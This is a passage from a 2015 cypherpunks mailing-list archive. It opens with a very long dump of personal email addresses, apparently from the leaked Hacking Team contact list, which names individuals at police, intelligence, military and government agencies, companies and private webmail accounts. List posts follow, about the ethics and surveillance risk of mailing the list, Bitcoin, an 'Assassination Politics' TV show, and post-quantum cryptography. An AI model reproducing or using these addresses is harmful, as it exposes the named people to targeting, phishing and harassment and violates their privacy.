eugenio.santagata at elt.it evalen at arlingtonva.us evandro.pefron at gmail.com EVANS.DEVELOPMENT at GMAIL.COM evdokiyatankova at gmail.com evgen2910 at gmail.com evillanueva at guatemala-embassy.org ewlock at hotmail.com eyance at fairfaxcounty.gov eyupsubasi at hotmail.com fabio.cucciniello at bracco.com fabio.ghezzi at prada.com fabio.lisca at gmail.com Fabio.raimondi at coster.com Fabio.zorzi at 
cobospa.it fabrizio.di-narda at electrolux.it fadzlee at cybersecurity.my fahaimi at ymail.com fahmy at istnetworks.com faizall at rmp.gov.my falcochang at gmail.com farian.rinaldi at kpk.go.id fauzi at cybersecurity.my fauzimajid at gmail.com fawad.psp at gmail.com fazio.giovanni at comune.como.it fbashqawi at gmail.com f.bolognesi at inet.it f.bongiovanni at toroassicurazioni.it fdanladi at gmail.com fe0085 at fe-ddis.dk fe0106 at fe-ddis.dk fe3212 at fe-ddis.dk fe6172 at fe-ddis.dk federico.galante at jci.com felicia.hobbs at montgomerycountymd.gov felix at dnpa.nl fendy at cybersecurity.my ferhatgoktepe at hotmail.com fernando.gomes at aachen.utimaco.de fernandos.piedrafita at policia.es ff222222 at hotmail.com ffguler at gmail.com fgarbin at cartasi.it fgh.sales at gmail.com fibrahim at moi.gov.qa filipebalestra at gmail.com filippo.mazzoli at kme.com firsttimetorome at gmail.com firuzcetinkaya at gmail.com firzok at yahoo.com fitri1984 at yahoo.com fjvision at gmail.com flakhani at SS8.com flaviabastos04 at hotmail.com flavio141941 at live.com flavio.martini at cameo.it flavio.vigano at vodafone.com fmdera at gmail.com fmuhaya at ksu.edu.sa fndegwam at hotmail.com f.nebiolo at tsf.it F.NOOM at MINDEF.NL fourteenthmember at hotmail.com foxnov2011 at gmail.com fpasquazzo at yahoo.it fpenginet at gmail.com fptalmeida at gmail.com france at ambassadetogo.org francesca.dibella at boero.it francesco.delgreco at np.ge.com francesco.nasuti at bpm.it francesco.perrini at unibocconi.it francesco.sperandeo at interno.it francesco.tentori at antonveneta.it francesco.zambon at eni.it francois.danieli at privacycommission.be Franco.Parisi at sparkasse.it frank.land at icloud.com frank.leitera at uscp.gov frans.nab at rijnmond.politie.nl fredd0104 at aol.com freddy.borja.policia.ecuador at gmail.com freek2023 at yahoo.de frohlichmd at state.gov fsmousa at tcc-ict.com ftiangsu at dso.org.sg ftonidandel at gardacartiere.it fzlh_musa at yahoo.com gabrielcdias at gmail.com 
gabriel.demitri at bnpparibas.com gadburt.mercado at me.com gadi at koor.com.mx galvao.fgsr at dpf.gov.br ganbat_1199 at yahoo.com gaofarrell at uspis.gov garcia at glimmerglass.com garry.collins at mfat.govt.nz gary.porcas at soca.x.gsi.gov.uk gary.thomas at southyorks.pnn.police.uk gato at guardiacivil.org gat.zvi at gmail.com gautam at yohaya.com gautierf at un.org gaziabrar at hotmail.com gbg2004-facebook at yahoo.com g.catalogna at crc.sm g.dacquisto at garanteprivacy.it gebru2008 at gmail.com gene.hughes2 at hq.doe.gov general.ayoubi at gmail.com george.katsia at gmail.com gerginn at vcu.edu Gerhard.streit at bka.bund.de gernot.jochem at polizei.nrw.de gert.polli at polli-ips.com gfueston at wb.hidta.org gguglielmotto at tntitaly.it gianfranco.ferro at thalesgroup.com gianlucafatone at yahoo.it gianluca.santeramo at ingdirect.it gian.marco.de.grimani at bpm.it gianni.klaus.bonaccolto at it.zurich.com gianpaolo.zambonini at interno.it gilberto_de_tomasi at aon.it Gil.Smolinski at midagi.biz giorgosgramma at yahoo.gr giovanni.facchetti at vodafone.com giovanni.oteri at iper.it giuliano.tavaroli at gmail.com giuscri at gmail.com giuseppe.cutro at auroraassicurazioni.it giuseppe.diieva at interno.it giuseppe.giannicolo at rasnet.it Giuseppe.Martinelli at ftcoop.it glider.aju at gmail.com glider.caf at gmail.com GMassaro at credem.it gobrac at gmail.com golan at idt.net gpiedras at gmail.com gray21005 at yahoo.com gregory.oneil at navy.mil gregory.weisman at dodiis.mil grndoor at blueyonder.co.uk grosete at cosmosgh.com grthomas at pa.gov g.saglia at barilla.it g.tempelers at mindef.nl gtprice at uspis.gov gtracktechnology at gmail.com guglielmo.caruso at hp.com guido.dunand at csi.it gurujake at gmail.com guymolho at gmail.com gyang.chollom at yahoo.com h12.office at bmlv.gv.at h17.office at bmlvs.gv.at h57.office at bmlv.gv.at h6.office at bmlv.gv.at h6.office at bmlvs.gv.at haalattas at scad.ae habibkhawaja64 at yahoo.com hackingteam at add2000.de hackingteam 
at biow.org hackingteam at promesoft.com hafiz at cybersecurity.my haggai.arumae at tcsi.org.sb ha_ie2004 at yahoo.com hairulabidin at rmp.gov.my hairulanuar at yahoo.com hakb12 at paran.com hakimoby at gmail.com halbischc at saps.gov.za halo at hackingteam.it hamaratmurat at hotmail.com hamdiyesilyurt at gmail.com hamoooooodi at gmail.com hamydon.ibrahim at police.gov.bn hanan.gino at verint.com handsome127 at gmail.com hans-peder.torgersen at politiet.no hans.sjolin at polisen.se hanzhiwei at chinatopcom.com harasis_1 at yahoo.com harme at cmc.gov.my harpreet.singh at alcatel-lucent.com harry.finley at navy.mil harry.patel at ukti.gsi.gov.uk harshkhandelwal345 at gmail.com haryo.atmojo at kpk.go.id hassan.alzadjali at omantel.om Hassan at omantel.net.om havard.folkedal at kripos.no havlicek at ppcr.cz hcatalkaya at gmail.com head at cybercrimeunit.gr heartb99 at gmail.com heather.gordon at ic.fbi.gov hectordavilam at gmail.com hector.garcia at ic.fbi.gov helena.prazska at fedpol.admin.ch hell.storms at gmail.com helpteam66 at gmail.com henry.aljand at reach-u.com herbert.slaghekke at minbzk.nl hfdjustdienst_kps at hotmail.com hga at zone3.nu hg.kim at sktelecom.com hg.schilling at sim-electronic.com hguerra at sbcsd.org hh at suncraftgroup.com hhuettner at ftc.gov hhwchan at ops.icac.org.hk hilalss at gmail.com hinmanjc at state.gov hk at sirius-bg.com hoadina at yahoo.com.vn hoebick at yahoo.com holtai.andras at nbsz.gov.hu homg592 at yahoo.com hoosena at saps.org.za horace.lawalt at fairfaxcounty.gov horinek.jan at seznam.cz hotabot at gmail.com hotdb84 at gmail.com houssame.mo at gmail.com hsubolo at gmail.com htjinliepshie at gmail.com htrabert at aberdeen-md.org Hugh.Thatcher at USCP.gov husin at sprm.gov.my husrin.hassan at kdn.gov.bn hussainali at ssdd.gov.ae hussaynan at moisp.gov.sa hyamaguchi09 at npa.go.jp iamtrilliontt at gmail.com ian.brown at jcf.gov.jm ibadea at vitech.ro ibrahimabdullah62 at yahoo.com ibterry at microsoft.com icg.icg at 
btconnect.com ider_us at yahoo.com idris.aviasian at gmail.com ilealydia at yahoo.co.uk ilmari.viro at poliisi.fi imoustapha at misron.org imranpsp at gmail.com indrabrahmana007 at gmail.com info at alarm.de info at defensetechs.com info at revuln.com info at shot.ba info at technopolis.gr intelligentcop at yahoo.com interpolpanama at hotmail.com inyigroup at yahoo.com ioannis.kormpis at gmail.com ion.toader at finro.ro iotbmail at yahoo.com i.pedrielli at unipol.it ipmuscat at omantel.net.om iqbal at sanocorp.com irenem at elcom.co.za irvan.ardiansyah at kpk.go.id isaaclee at add.re.kr isack_667777i at yahoo.com iskandar9116 at gmail.com issadji05 at yahoo.fr isspraha at gmail.com issworldamericas at gmail.com itay at reved-mi.com ittipolenator at gmail.com itzik.vager at verint.com ivan.gaoseb at gov.mof.na ivanjohnuy at gmail.com ivazac at cfcs.dk ivo.paeske at politsei.ee j4cobk at gmail.com jaanus.peet at politsei.ee jaap.boonstra at group2000.eu jabumwasha at gmail.com Jackra at hotmail.com jacobsjung at gmail.com jacqueline.wilson at ic.fbi.gov jacques_aboussouan at yahoo.com jadijpn at hotmail.com jadi.le at us.army.mil jadonnelly06 at gmail.com jahanhome at gmail.com jakub.kriz at ppcr.cz jalee at ncis.navy.mil Jalee at ncis.navy.mil jameldaouadi at aol.com james at defenceandsafety.com james.farrell2 at met.police.uk james.goldman112 at mod.uk james.meehan at usss.dhs.gov james.patino at correo.policia.gov.co jamsranjav_batsukh at yahoo.com jan.immeker at limburg-zuid.politie.nl janis.kahar at siseministeerium.ee JanMiler at seznam.cz janos at renzhotz.com jari.haatainen at poliisi.fi jason198kr at gmail.com jason.Baldry at mi-fusion.co.uk jason.scoles1 at navy.mil jason.shaver at ice.dhs.gov JassoJL at gmail.com javier.tsang at tylostec.com jawad216 at gmail.com jb at oiseurope.com jbpowell at lasd.org j.c.8844 at police.be jcabezasl at guardiacivil.es jcaicedo at robotec.com jcaponera at cyberpointllc.com jcheat at fairfaxcounty.gov JChitwood at 
sheriffleefl.org jcrowe at iiaweb.com jd_intel2000 at yahoo.co.uk jdkonde at hotmail.com jdtoledomartinez at guardiacivil.es jean-marc.rodriguez at interieur.gouv.fr jeannoel.tassiaux at polnam.be jean-philippe.lelievre at fr.thalesgroup.com jean-werner.haidt at astrium.eads.net jebogaring at hotmail.com jed at sandstone.lu jeetu at semcoindia.com jeff.brannigan at ice.dhs.gov jeff.dickerson at memphistn.gov jeffesantos at ig.com.br Jeff.Janczyk at dc.gov jermia.djati at kpk.go.id jerry.mancini at fidelissecurity.com jerrytieng at gmail.com jesper.andersen at baesystemsdetica.com jesse.henderson at dhs.gov jesuino.ferreira at yahoo.com.br jesusguerrero at guardiacivil.es jfpacault at laposte.net jg.coster at mindef.nl jgroberts at dstl.gov.uk jgutkin at co.burlington.nj.us jhilliard at drps.ca jim1733 at hotmail.com Jim.Baker at colliersheriff.org jim.dunstan at scdea.pnn.police.uk jimmi.lapotulo at gmail.com@ jim.thrift at usss.dhs.gov jindrich.hora at seznam.cz jiri.jenis at px.mvcr.cz jirij at px.mvcr.cz jiri.oplatek at gmail.com jiri.patka at px.mvcr.cz jje at icginc.com jkclo at ops.icac.org.hk jla at npt.no jlapier at howardcountymd.gov jlfisher at co.pg.md.us jliddie at att.com jmiille at narus.com jmmcdaniel at sheriffleefl.org jmreid at annapolis.gov jnnamani at gmail.com joe.mizell at dhs.gov joe.m.mizell at ice.dhs.gov johan.dahl at polisen.se johande at politiet.no johann.ortega at dpd.ci.dallas.tx.us john.ainsworth at soca.x.gsi.gov.uk john.anderson at vsp.virginia.gov john.brady at phila.gov john.chambers at westyorkshire.pnn.police.uk john.cutright at ic.fbi.gov johnfg at rccb.osis.gov john.hedgecock at dc.gov john.m.carroll at dhs.gov john.minsek at ci.irs.gov john.oldman at polehill.co.uk john.pearson2 at dodiis.mil jon.abolins at gmail.com Jon.Abolins at gmail.com Jon.Abolins at gmail.com Jonas.Holguin at memphistn.gov jonathan.jordan at dc.gov jonathan.ponting at icc-cpi.int joost.van.slobbe at klpd.politie.nl jordan.arthur at rcmp-grc.gc.ca 
josee.rouette at surete.qc.ca jose at gsmsat.com josempgr at gmail.com Jose.Nieves-Campose at dc.gov joseph.belfiore at dc.gov joseph.cannataci at um.edu.mt joseph.ferrigno at dhs.gov joseph.j.snyder at verizon.com joseph.p.todd at ncis.navy.mil jose.ruiz at polizei.niedersachsen.de joshua.kauffman2 at safexchange.gov joshualyn2002 at yahoo.com jova-19 at hotmail.it joycedavid8 at hotmail.com joyce.l.baker at verizon.com jpendell at montcopa.org jpjansenvanvuuren at gmail.com jpm120 at gmail.com jps_hrd at yahoo.co.uk jp.s at veheretech.com jrager at cyberpointllc.com jraul.mp at gmail.com jrumsfeldtei at gmail.com jryman at frontroyalva.com jsalmazrouei at yahoo.com jshelmo at gmail.com jsmulders at telkomsa.net jsoler at guardiacivil.es jsphmwai13 at gmail.com j.taki at laposte.net juan.davila at dc.gov juanm_kobain at hotmail.com judith.albritton1 at navy.mil Julian.Browne at carlyle.com julien.cartier at vd.ch Julie.Thompson at ps.gc.ca julioponte81 at hotmail.com julius.pivoriunas at policija.lt junar.aja at gmail.com juniornorman84 at yahoo.com jussi.ramo at poliisi.fi Justin.bolding at dc.gov jwatson at uspsoig.gov jzzandamela at gmail.com Kahlouch2323 at gmail.com kailcorner at yahoo.com kalkaabi at qatar.net.qa kamar64 at rmp.gov.my kaneco32 at hotmail.com kane.crisler at usss.dhs.gov kardos at gsshungary.hu karel.peeters at ibpt.be karen.bragadottir at tollur.is karimarchok at hotmail.com karimhs at yahoo.com kassim.abas at gmail.com kaszap.tamas at knbsz.gov.hu katherine.ruane at dhs.gov kathleen.kinsella at us.army.mil kathleen.oleary at fairfaxcounty.gov kathleenrmcmanus at gmail.com katrin.hoffmann at sfztk.bund.de kazmos_61 at yahoo.com kbmuhd at yahoo.com kbp001 at politi.dk k.campo at kcpd.org kchikovore at gmail.com kcyi.leo at gmail.com keilcom at gmail.com Keith.Cutler at dodiis.mil keith.torbit at gmail.com keith.wareham at stratosglobal.com kel at co.henrico.va.us kelly.chant at thamesvalley.pnn.police.uk kenji.arima at mofa.go.jp ken.mann at 
homeoffice.pnn.police.uk Kenya.Jackson at dc.gov kereeletswe at gmail.com kerry.l.cuneo.mil at mail.mil keysonlima at hotmail.com kg at sirius-bg.com khaily208 at gmail.com khaled.alneaimi at gmail.com khalid at ssd.gov.ae Kherbil at gmail.com khoo_gin_tiong at spf.gov.sg khwajazia at yahoo.com kidanu4u at gmail.com kid_binalfew at yahoo.com kiley.dominie at stratosglobal.com kimber.burks at sheriff.hctx.net kimberly.anderson at kcpd.org kimberly.schmid at gmail.com kimugawa at gmail.com kimurahto at nttdata.co.jp kirk.ellis at us.army.mil kismiki at email.com kissltamas at gmail.com kk at gsmk.de kkhalife at usa.net kkoppenhafer at ncmec.org # KL #klaus.mochalski at adytonsystems.com julia.schuffenhauer at adytonsystems.com klausweigmann at gmx.de klovesj at kcc.go.kr kmgarni at hotmail.com kocsis.imre1 at telekom.hu kodiyil at etisalat.ae koh.kaimeng at stee.stengg.com komandur26 at yahoo.com kovacs.mate at telekom.hu k.oztemel at mrd.com.tr kprasadindia at hotmail.com krislynx06 at yahoo.com kristofer.mansson at silobreaker.com ksenator at ss8.com KSimpson at azdps.gov k.stockebrandt at bfv.bund.de kucera.jarda at gmail.com kucharik at mvcr.cz kvv1961st at gmail.com kwolfe at FrederickMDPolice.org kyawwin.thein66 at gmail.com kyle.hearfield at vpd.ca ladislav.prochazka at px.mvcr.cz laila_02010_eg at yahoo.com Lance.Cary at hq.doe.gov land1234 at gmail.com landersj at co.rockland.ny.us lars.strangstad at politiet.no Lauren.cunningham at okc.gov laurent.canel at police.ge.ch lawal_lasisi1 at yahoo.com lawrence.dring at us.army.mil l.ciolini at abcifashion.com l.colombi at carvico.com leah.aboabdo at doj.ca.gov lee.e.sattler at verizon.com lee_kok_thong at mindef.gov.sg lengbunna at hotmail.com lengchua at dso.org.sg leo.bi at kexion.com LeonardCH2 at state.gov leonardo.casubolo at ompimespo.it leonidas.gaidamovicius at cust.lt leopold.zammit at gov.mt leslie.brooks at dhs.gov Leslie.Collins at ci.irs.gov letfus at mvcr.cz letfus at ppcr.cz l.hsaine at yahoo.com 
liawst at rmp.gov.my limchwenjen at stee.stengg.com lince11 at guardiacivil.es lingg at glimmerglass.com lino.iglesias at smartmatic.com lino.lucchinetti at aduno.ch Lisa.C.Hostetter at nga.mil liva0898 at gmail.com lizhoulihan at netscape.net lkokthon at dsta.gov.sg l.menghini at nventaid.it lmgcpgr at gmail.com lmikasa at narus.com lmorcurto at gmail.com LOCK_Eng_Wah at starnet.gov.sg logitexsa at gmail.com lorenzo.bellucci93 at gmail.com lossola at ncmec.org louis.robinson at fairfaxcounty.gov love10194 at gmail.com lpp6361 at gw.njsp.org lsbeto at gmail.com lstarnauld at ncmec.org luca.camponogara at bpv.it Luca.delfini at aciglobal.it luciano.piovano at loquendo.com luci.jacksontaylor at ncis.navy.mil lucmarini at gmail.com luigi.caramico at rdslab.com luigi.ranzato at giustizia.it luisdecastro at codigoazul.pt luis.deeusebio at policia.es luis-s-cardoso at netcabo.pt luiz.lhas at gmail.com lulzim.kurtaj at art-ks.org Lupe.Pruneda at dhs.gov Lynn.Rosenberg at dc.gov m31053 at mjib.gov.tw M7MD-AS at hotmail.com maalmerri at scad.ae mabula.eliezer80 at yahoo.com machadoc at chesterfield.gov madarovar at ctu.cz madisam2007 at yahoo.fr maf_10s at yahoo.com mageealshamali at hotmail.com maher.m at hotmail.com mahmed_0102000 at yahoo.com m.ahsako at hotmail.fr mail at newtonsidhu.com maino.g at atm.torino.it majed at moisp.gov.sa majid at al-shubbar.com makindevincent at aol.com malawihighcommission at btconnect.com m.alherais at gmail.com malungam at mweb.co.za mangellara at guardiacivil.es maniaccop at telenet.be manuchimeno at me.com m at aortace.com maphatsoel at gmail.com marc69006 at gmail.com marcel.kuca at px.mvcr.cz marcellofaggioni at gmail.com marceloacarrillo at gmail.com marc.meeker at us.army.mil marco.aimetti at aermacchi.it marco.aimetti at aermacchi.it marco.buoncristiano at gmail.com marco.carello at tnt.com marco.coppola at borsaitaliana.it marco.moscardi at electrolux.it marco.pinciroli at innogest.it marcos7m59 at gmail.com marco.zanussi at 
gruppomg.com marcus at necgroup.ae marek.pogonowski at gmail.com Marie-Helene.Chayer at ps.gc.ca marilou.gougeon at forces.gc.ca marino.fracchioni at selavio.com mario.manfredi at cassacentrale.it marjory.blumenthal at gmail.com markamess at yahoo.fr mark.b at idsca.org mark.daly at ntac.gsi.gov.uk markey at fallstwp.org mark.gazit at gmail.com mark.koenig at dps.texas.gov mark.lastdrager at pine.nl mark.s.diaz.civ at mail.mil mark.stuart at met.pnn.police.uk mark.ward at bt.com maromdanmail at gmail.com marta.kwiecinska at msz.gov.pl marten.framback at mil.se martin at balch.fr martin.beekink at haaglanden.politie.nl martin.ku at sktelecom.com martin.schermer at minbzk.nl martin.schoenenberger at vtg.admin.ch martti.lukki at emta.ee mas001 at politi.dk masella_domenico at mtsspa.it mashdik at gmail.com masingek at mweb.co.za masingek at yahoo.com masrudy.ismail at cmc.gov.my massimo.alt at mascioni.it massimo.chiusi at unicredit.it massimo at cotrozzi.com matakataY at saps.gov.za matar.hareb at hotmail.com matmin_mie at yahoo.com matteo.meucci at gmail.com matteo.torri at ducati.com mattgt500 at btinternet.com matthew.jewett at fairfaxcounty.gov matthew.orysiek at dhs.gov matthew.pellegrini at us.army.mil mattia.beraldo at airc.it mattiaromano1 at gmail.com matt.lynch at montgomerycountymd.gov maureen.s.doyle at verizon.com maurice.graham at dhs.gov maurizio.colombo at effemmedue.it maurizio.garbelli at gruppomg.com maurizio.gatti.88 at gmail.com mauro.bellocchio at mediolanum.it Mauro.bizzo at giessegroup.com mauro.luchetta at gruppoitas.it mavex at me.com max at inbox.ae mazeff at montcopa.org mazlan at cmc.gov.my mbell at brx.dk mbittinger at mitre.org m.castelli at feinrohren.it McCreeryM at battelle.org mclark at ncmec.org mcozzi at gdaservice.it md1231 at att.com m.dalre at araknos.it mddoran at slmpd.org mdembin at 014.net.il medhebiz at yahoo.fr medredbdz at hotmail.fr meildeluis at hotmail.com mekapol at yahoo.com mel33495 at hotmail.com melissa.cowan at 
dhs.gov melton.phiri at potraz.gov.zw menzidane at aol.com mesh998 at hotmail.com mes at messa.ch messick at arcanumglobal.com metzgning at yahoo.fr mfatihtezcan at gmail.com mgenossar at aol.com mgitchel at ncmec.org m.g at tecnogi.com mhammond at aacounty.org mhindmarch at drps.ca mhwkam at gmail.com Michaela.Stonova at gmail.com michael.derian at dc.gov michael.freeman at dpd.ci.dallas.tx.us michael.goewey at navy.mil Michael.Hawkins at cityofls.net michael.hoban at met.pnn.police.uk michael.hynes at longbeach.gov michael.medley at cincinnati-oh.gov michael.niva at saabgroup.com michael.pak at dhs.gov michael.ruecker at aachen.utimaco.de Michael.Shinn at dhs.gov michael at site-line.com michael.thoene at tesit.bka.de michael.warren at memphistn.gov michael.williamson at spsa.pnn.police.uk michael.yu at montgomerycountymd.gov michel.dufour at surete.qc.ca michelestick at gmail.com Michelestick at gmail.com Michelle.A.Hose at verizon.com midris_omar at petronas.com.my miguelhh_1 at hotmail.com mihaela.dodoiu at fco.gov.uk mihai.chiorcea at gmail.com mikec at ccpu.com Mike.Fischer at polizei.bund.de mikko.hypponen at f-secure.com milcomete.serban at gmail.com milkexploit at gmail.com millerdsss at yahoo.com milosstr at centrum.cz Milosstr at centrum.cz minarikovap at ctu.cz min.coord at hcilondon.in mirwais_786 at yahoo.com miso.kanlic at policija.si mj.kyawzaya at gmail.com MJRay at uspis.gov MJ.Ronkes at mindef.nl mk7029 at ukr.net mkaubrey66 at gmail.com mkorajac at otc.hr mm.venderbosch at mindef.nl mnkhzrg at gmail.com modu at thaliasolutionsltd.com moedjiono at gmail.com moh.almshali at gmail.com mohamedfadzlee at gmail.com mohamedfarok at gmail.com mohdamran at rmp.gov.my mohdbinhatem at hotmail.com mohdkhairudin at rmp.gov.my mohdnasmi at rmp.gov.my mohdsyukri at cmc.gov.my mohlomit at gmail.com moi_lawyers at hotmail.com molayem.daniel at gmail.com monang at nenggala.co.id moneimam at hotmail.com montoyaj at bbfl.us morganb at chesterfield.gov morio1950 at 
From list at sysfu.com Fri Jul 10 00:17:57 2015
From: list at sysfu.com (Seth)
Date: Fri, 10 Jul 2015 00:17:57 -0700
Subject: From: root@hackingteam.it To: vince@hackingteam.it [and who?]
In-Reply-To: <20150710070020.GF61602@r4>
References: <20150710070020.GF61602@r4>
Message-ID:

On Fri, 10 Jul 2015 00:00:20 -0700, Tom wrote:

> Wouldn't it have been enough to post the url?
>
> http://ptrace.fefe.de/fpalm30c3.jpg

I actually appreciate content posted in message, get tired of having to fire up a browser for links. Also every click on a browser link is a potential attack whereas plain-text in an email is not.

From list at sysfu.com Fri Jul 10 01:23:37 2015
From: list at sysfu.com (Seth)
Date: Fri, 10 Jul 2015 01:23:37 -0700
Subject: From: root@hackingteam.it To: vince@hackingteam.it [and who?]
In-Reply-To: <20150710075127.GG61602@r4>
References: <20150710070020.GF61602@r4> <20150710075127.GG61602@r4>
Message-ID:

On Fri, 10 Jul 2015 00:51:27 -0700, Tom wrote:

> Normally I'd agree. But in this case it's different imho. Nobody knows
> if I read the list posted on wikileaks since the access is tls
> encrypted. However, now that the whole list has been posted by mail in
> the clear, everyone sniffing on my mail traffic knows that I've got it.

Makes me wonder if receiving that list of hacking team emails could actually increase your perceived 'threat level' beyond the one assigned for being subscribed to cpunks or visiting the Tor project web site for example.

BTW, yer domain's mail server STARTTLS setup is kind of crappy according to starttls.info [1]. Maybe you could tighten that up to protect against future cpunks emails packed with juicy bits.

[1] https://starttls.info/check/vondein.org

From mirimir at riseup.net Fri Jul 10 03:10:21 2015
From: mirimir at riseup.net (Mirimir)
Date: Fri, 10 Jul 2015 04:10:21 -0600
Subject: From: root@hackingteam.it To: vince@hackingteam.it [and who?]
In-Reply-To:
References: <20150710070020.GF61602@r4> <20150710075127.GG61602@r4>
Message-ID: <559F9A0D.3020605@riseup.net>

On 07/10/2015 02:23 AM, Seth wrote:
> On Fri, 10 Jul 2015 00:51:27 -0700, Tom wrote:
>> Normally I'd agree. But in this case it's different imho.
>> Nobody knows
>> if I read the list posted on wikileaks since the access is tls
>> encrypted. However, now that the whole list has been posted by mail in
>> the clear, everyone sniffing on my mail traffic knows that I've got it.
>
> Makes me wonder if receiving that list of hacking team emails could
> actually increase your perceived 'threat level' beyond the one assigned
> for being subscribed to cpunks or visiting the Tor project web site for
> example.

OK, how many remember waiting for a subpoena during Jim Bell's trial?

Me, I'd subscribed through a remailer ;)

> BTW, yer domain's mail server STARTTLS setup is kind of crappy according
> to starttls.info [1]. Maybe you could tighten that up to protect against
> future cpunks emails packed with juicy bits.
>
> [1] https://starttls.info/check/vondein.org
>

From mirimir at riseup.net Fri Jul 10 04:01:28 2015
From: mirimir at riseup.net (Mirimir)
Date: Fri, 10 Jul 2015 05:01:28 -0600
Subject: cypherpunks Digest, Vol 25, Issue 9
In-Reply-To:
References:
Message-ID: <559FA608.8010200@riseup.net>

On 07/10/2015 04:25 AM, ksenia bellman wrote:
> on the topic of Bitcoin philosophical musings and pressures:
>
> There is unusually a lot of btc discussion on the list lately: technical (the
> fork), philosophical and practical.
>
> On the philosophical/political side: btc is great, I like it, I use it,
> but, come on, we all know that by design (increasing difficulty of the
> chain and proof-of-work system) btc is determined to be a space race.
> Before you can maintain the network with simple hardware, and get btc for
> it, now you have to be a mining rig. We know that btc is good for P2P
> financial transactions, but the first important question now is:
> How do you earn bitcoin? (as an individual, you can't mine, if you are not
> a programmer or a designer, how do you earn btc?)
> It becomes less and less of a question how do you spend btc, but still,
> unless I mined a lot in the past or bought it for cash, where do I get it?
Yes, mining by individuals hasn't been feasible for some years. And there aren't that many ways (so far) to earn Bitcoin. So most users will need to buy Bitcoin. If anonymity doesn't matter much, that's generally not very hard.

From Rayzer at riseup.net Fri Jul 10 07:30:09 2015
From: Rayzer at riseup.net (Razer)
Date: Fri, 10 Jul 2015 07:30:09 -0700
Subject: From: root@hackingteam.it To: vince@hackingteam.it [and who?]
In-Reply-To:
References: <20150710070020.GF61602@r4>
Message-ID: <559FD6F1.5060604@riseup.net>

On 07/10/2015 12:17 AM, Seth wrote:
> On Fri, 10 Jul 2015 00:00:20 -0700, Tom wrote:
>
>> Wouldn't it have been enough to post the url?
>>
>> http://ptrace.fefe.de/fpalm30c3.jpg
>
> I actually appreciate content posted in message, get tired of having
> to fire up a browser for links. Also every click on a browser link is
> a potential attack whereas plain-text in an email is not.
>

Riseup flagged it as potential ***Spam***, despite normally having no problem with coderman's postings b/c 'links'.

Just b/c 'plaintext' means you don't have to risk a click doesn't mean what's in the text (and all that may come from receiving it) is 'un-monitored'.

RR

https://www.youtube.com/watch?v=hkXHsK4AQPs

Ps. Old enough to remember when Ozzie had pimples

From jdb10987 at yahoo.com Fri Jul 10 00:40:38 2015
From: jdb10987 at yahoo.com (jim bell)
Date: Fri, 10 Jul 2015 07:40:38 +0000 (UTC)
Subject: Deathrow Democracy
Message-ID: <1419622931.2858212.1436514038928.JavaMail.yahoo@mail.yahoo.com>

Months ago, I discovered a TV-show in the making, called "Deathrow Democracy". Apparently it is a fictionalized treatment of Sanjuro's 'Assassination Market', as well as my 'Assassination Politics' essay.
I just found they have a Facebook page at: https://www.facebook.com/deathrowdemocracy
They have a web page at: http://deathrowdemocracy.com/
Teaser #1 at: https://www.youtube.com/watch?v=okmZdquYCjE
Teaser #2 at: https://www.youtube.com/watch?v=OnDaDlOJDTY
It appears that they are scheduled to release something on July 31, 2015.

Jim Bell

From oshwm at openmailbox.org Fri Jul 10 00:43:00 2015
From: oshwm at openmailbox.org (oshwm)
Date: Fri, 10 Jul 2015 08:43:00 +0100
Subject: From: root@hackingteam.it To: vince@hackingteam.it [and who?]
In-Reply-To:
References: <20150710070020.GF61602@r4>
Message-ID: <9E41BD0A-A7CD-469F-BCDE-E5F760EDE9D4@openmailbox.org>

Must admit, it was nice to be able to quickly scan the list to identify some of the more interesting addresses to look at in more detail later on today :)

On 10 July 2015 08:17:57 BST, Seth wrote:
>On Fri, 10 Jul 2015 00:00:20 -0700, Tom wrote:
>
>> Wouldn't it have been enough to post the url?
>>
>> http://ptrace.fefe.de/fpalm30c3.jpg
>
>I actually appreciate content posted in message, get tired of having to
>fire up a browser for links. Also every click on a browser link is a
>potential attack whereas plain-text in an email is not.

From tom at vondein.org Fri Jul 10 00:00:20 2015
From: tom at vondein.org (Tom)
Date: Fri, 10 Jul 2015 09:00:20 +0200
Subject: From: root@hackingteam.it To: vince@hackingteam.it [and who?]
In-Reply-To:
References:
Message-ID: <20150710070020.GF61602@r4>

Wouldn't it have been enough to post the url?
http://ptrace.fefe.de/fpalm30c3.jpg

- Tom

From tom at vondein.org Fri Jul 10 00:51:27 2015
From: tom at vondein.org (Tom)
Date: Fri, 10 Jul 2015 09:51:27 +0200
Subject: From: root@hackingteam.it To: vince@hackingteam.it [and who?]
In-Reply-To:
References: <20150710070020.GF61602@r4>
Message-ID: <20150710075127.GG61602@r4>

On Fri, Jul 10, 2015 at 12:17:57AM -0700, Seth wrote:
> I actually appreciate content posted in message, get tired of having to
> fire up a browser for links. Also every click on a browser link is a
> potential attack whereas plain-text in an email is not.

Normally I'd agree. But in this case it's different imho. Nobody knows if I read the list posted on wikileaks since the access is tls encrypted. However, now that the whole list has been posted by mail in the clear, everyone sniffing on my mail traffic knows that I've got it.

And I'd better not mess with such people:

> It's one thing to have dissatisfied customers. It's another to have
> dissatisfied customers with death squads. I don't think the company is
> going to survive this.
[via]

- Tom

via: https://www.schneier.com/blog/archives/2015/07/more_on_hacking_1.html

From guninski at guninski.com Fri Jul 10 00:41:02 2015
From: guninski at guninski.com (Georgi Guninski)
Date: Fri, 10 Jul 2015 10:41:02 +0300
Subject: [cryptography] Supersingular Isogeny DH
In-Reply-To:
References: <54C5545F.3060600@gmail.com> <54C92127.5060900@dev-nu11.de> <54C92732.70202@gmail.com> <54C9C907.5090501@dev-nu11.de> <559E13D3.8040602@dev-nu11.de>
Message-ID: <20150710074102.GA2529@sivokote.iziade.m$>

On Thu, Jul 09, 2015 at 01:24:12AM -0700, coderman wrote:
>
> i found this paper a helpful expansion on the subject:
> http://cacr.uwaterloo.ca/techreports/2014/cacr2014-20.pdf
> "In this paper, we mainly explore the efficiency of implementing recently
> proposed isogeny-based post-quantum public key cryptography..."
>

Disclaimer: I am a lame noob at this.

IMHO "post-quantum" is not well defined.
To my knowledge it is not known if quantum computers can solve SAT efficiently, which might break much more stuff than factoring.

If it happens P=NP with low exponent, quantum computers might not give much advantage.

P=NP with best complexity O(n^{1000}) probably is irrelevant _in practice_ as of now.

Remotely related:
http://blog.computationalcomplexity.org/2004/06/impagliazzos-five-worlds.html
Impagliazzo's Five Worlds

-- georgi

From guninski at guninski.com Fri Jul 10 01:11:30 2015
From: guninski at guninski.com (Georgi Guninski)
Date: Fri, 10 Jul 2015 11:11:30 +0300
Subject: From: root@hackingteam.it To: vince@hackingteam.it [and who?]
In-Reply-To:
